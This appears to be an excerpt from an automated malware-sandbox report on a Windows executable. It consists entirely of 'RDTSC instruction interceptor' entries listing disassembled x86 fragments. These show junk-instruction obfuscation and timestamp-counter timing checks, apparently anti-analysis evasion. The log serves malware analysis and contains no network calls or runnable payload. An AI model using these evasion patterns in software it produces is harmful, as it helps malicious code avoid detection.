                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D520 second address: 61D524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D524 second address: 61D56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FC070C1F312h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1E01h], esi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D2D1Dh] 0x0000001d push 00000000h 0x0000001f sbb esi, 1419C673h 0x00000025 xchg eax, ebx 0x00000026 jnc 00007FC070C1F30Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D56B second address: 61D574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D574 second address: 61D578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E07C second address: 61E0A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC070F37E38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC070F37E45h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E0A0 second address: 61E133 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC070C1F308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D1E01h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FC070C1F308h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FC070C1F308h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b sub edi, dword ptr [ebp+122D3125h] 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 pushad 0x00000054 ja 00007FC070C1F306h 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push edi 0x0000005e jmp 00007FC070C1F314h 0x00000063 pop edi 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FC070C1F30Fh 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FF5A second address: 61FF60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA51 second address: 61EA5B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC070C1F30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FF60 second address: 61FF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC070F37E36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA5B second address: 61EA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jp 00007FC070C1F306h 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA6C second address: 61EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC070F37E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C5B second address: 624C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C5F second address: 624C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62601F second address: 626029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC070C1F306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626029 second address: 62602D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6261B4 second address: 6261BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629274 second address: 629278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629278 second address: 629292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629292 second address: 629298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6283AC second address: 6283B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A504 second address: 62A51B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC070F37E3Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A51B second address: 62A521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A6A3 second address: 62A6A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A6A9 second address: 62A6BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jng 00007FC070C1F306h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F68B second address: 62F691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA1BB second address: 5CA1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA1BF second address: 5CA1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA1CB second address: 5CA1CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA1CF second address: 5CA1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E3Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e jnc 00007FC070F37E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA1ED second address: 5CA1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F80F second address: 62F813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F813 second address: 62F819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630830 second address: 6308C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push ebx 0x0000000c jo 00007FC070F37E36h 0x00000012 pop ebx 0x00000013 pop ecx 0x00000014 nop 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC070F37E38h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push edx 0x00000037 mov bl, B4h 0x00000039 pop ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 stc 0x00000042 mov eax, dword ptr [ebp+122D046Dh] 0x00000048 js 00007FC070F37E38h 0x0000004e mov ebx, eax 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ecx 0x00000055 call 00007FC070F37E38h 0x0000005a pop ecx 0x0000005b mov dword ptr [esp+04h], ecx 0x0000005f add dword ptr [esp+04h], 0000001Bh 0x00000067 inc ecx 0x00000068 push ecx 0x00000069 ret 0x0000006a pop ecx 0x0000006b ret 0x0000006c mov di, E43Bh 0x00000070 nop 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 je 00007FC070F37E36h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308C5 second address: 6308C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308C9 second address: 6308D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC070F37E36h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308D7 second address: 6308DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A02 second address: 634A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308DB second address: 6308EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007FC070C1F310h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318B1 second address: 6318B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A06 second address: 634A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318B7 second address: 6318BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A0C second address: 634A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, 32DCh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC070C1F308h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub bx, 0D11h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FC070C1F308h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D2DC1h], eax 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jbe 00007FC070C1F306h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A79 second address: 634A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A7D second address: 634A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634A87 second address: 634A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634C2F second address: 634C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FC070C1F306h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634D08 second address: 634D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070F37E3Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635CE5 second address: 635CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635CE9 second address: 635CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635DB0 second address: 635DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE29F second address: 5DE2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE2A3 second address: 5DE2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE2A9 second address: 5DE2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE2AD second address: 5DE2BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC070C1F306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C7AF second address: 63C7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C7B4 second address: 63C7CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC070C1F306h 0x0000000a jmp 00007FC070C1F311h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C7CF second address: 63C7E5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC070F37E36h 0x00000008 jnl 00007FC070F37E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F282 second address: 63F296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC070C1F306h 0x0000000a jnp 00007FC070C1F30Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6428CE second address: 64290E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FC070F37E43h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FC070F37E47h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64290E second address: 642912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642912 second address: 642918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642A23 second address: 642A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FC070C1F30Eh 0x0000000d jns 00007FC070C1F308h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC070C1F30Fh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642A4D second address: 642A81 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007FC070F37E4Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642A81 second address: 46DBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pop eax 0x00000007 jne 00007FC070C1F313h 0x0000000d jmp 00007FC070C1F30Dh 0x00000012 push dword ptr [ebp+122D0571h] 0x00000018 cld 0x00000019 call dword ptr [ebp+122D273Eh] 0x0000001f pushad 0x00000020 pushad 0x00000021 mov ebx, dword ptr [ebp+122D2A99h] 0x00000027 movzx ebx, bx 0x0000002a popad 0x0000002b pushad 0x0000002c mov esi, dword ptr [ebp+122D2BADh] 0x00000032 mov esi, dword ptr [ebp+122D29FDh] 0x00000038 popad 0x00000039 xor eax, eax 0x0000003b stc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 xor dword ptr [ebp+122D1D52h], ecx 0x00000046 jne 00007FC070C1F318h 0x0000004c mov dword ptr [ebp+122D2BD9h], eax 0x00000052 jmp 00007FC070C1F315h 0x00000057 mov dword ptr [ebp+122D1D52h], eax 0x0000005d mov esi, 0000003Ch 0x00000062 jmp 00007FC070C1F30Eh 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b jmp 00007FC070C1F30Ah 0x00000070 lodsw 0x00000072 jmp 00007FC070C1F313h 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b jne 00007FC070C1F320h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 jg 00007FC070C1F324h 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f jmp 00007FC070C1F30Fh 0x00000094 pop edx 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6495FD second address: 649608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649608 second address: 64960E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648ABB second address: 648AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E48h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E81 second address: 648E98 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC070C1F306h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC070C1F30Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64902A second address: 649043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E3Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d jbe 00007FC070F37E36h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649043 second address: 64904E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC070C1F306h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6491A5 second address: 6491A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6491A9 second address: 6491CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC070C1F312h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F13C second address: 64F140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F140 second address: 64F15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jo 00007FC070C1F306h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 js 00007FC070C1F30Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F15F second address: 64F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F165 second address: 64F17E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC070C1F312h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F17E second address: 64F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DC77 second address: 64DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DC7D second address: 64DC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070F37E45h 0x00000008 jo 00007FC070F37E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64DDF7 second address: 64DE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F310h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EB77 second address: 64EB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EB7B second address: 64EBAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC070C1F317h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE278 second address: 5FE27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE27E second address: 5FE28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC070C1F30Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE28E second address: 5FE292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE292 second address: 5FE2C4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC070C1F319h 0x00000008 pushad 0x00000009 jno 00007FC070C1F306h 0x0000000f jmp 00007FC070C1F30Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
